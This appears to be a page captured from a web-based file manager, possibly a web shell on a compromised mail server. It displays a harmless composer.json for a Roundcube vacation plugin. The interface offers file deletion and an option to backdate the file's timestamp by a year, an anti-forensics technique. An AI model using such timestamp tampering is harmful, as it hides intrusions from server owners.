文件操作 - composer.json
返回文件管理
返回主菜单
删除本文件
文件: /usr/local/cwpsrv/var/services/roundcube/plugins/vacation/composer.json
编辑文件内容
{ "name": "bukowski/vacation", "type": "roundcube-plugin", "description": "Vacation, out-of-office and forward feature for Roundcube", "keywords": ["mail","vacation","forward"], "homepage": "https://github.com/bukowski12/roundcube-vacation-plugin", "license": "GPL-3.0+", "version": "2.1.2", "authors": [ { "name": "Roman Plessl", "homepage": "https://github.com/rplessl", "role": "Author" }, { "name": "Gabor Toth", "homepage": "https://github.com/gabor-toth", "role": "Contributor" }, { "name": "Bukowski", "homepage": "https://github.com/bukowski12", "role": "Contributor" } ], "repositories": [ { "type": "composer", "url": "https://plugins.roundcube.net" } ], "require": { "roundcube/plugin-installer": ">=0.1.6" }, "extra": { "roundcube": { "min-version": "1.4.0" } } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件